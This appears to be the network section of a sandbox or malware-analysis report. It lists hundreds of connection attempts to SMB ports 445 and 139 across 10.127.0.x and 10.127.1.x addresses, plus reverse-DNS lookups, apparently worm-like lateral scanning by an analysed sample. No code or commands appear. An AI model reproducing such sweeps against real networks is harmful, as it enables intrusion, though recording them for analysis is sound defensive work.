| N/A | 10.127.0.48:445 | tcp | |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.72:139 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.88:139 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.236:445 | tcp | |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.255:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.1.0:139 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.1.1:139 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.2:139 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.3:139 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.4:139 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.5:139 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.6:139 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.1.7:139 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.8:139 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.9:139 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.10:139 | tcp | |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.11:139 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.12:139 | tcp | |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.1.13:139 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.14:139 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.15:139 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.16:139 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.17:139 | tcp | |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.1.18:139 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.19:139 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.20:139 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.21:139 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.22:139 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.23:139 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.24:139 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.1.25:139 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.1.26:139 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.1.27:139 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.28:139 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.29:139 | tcp | |
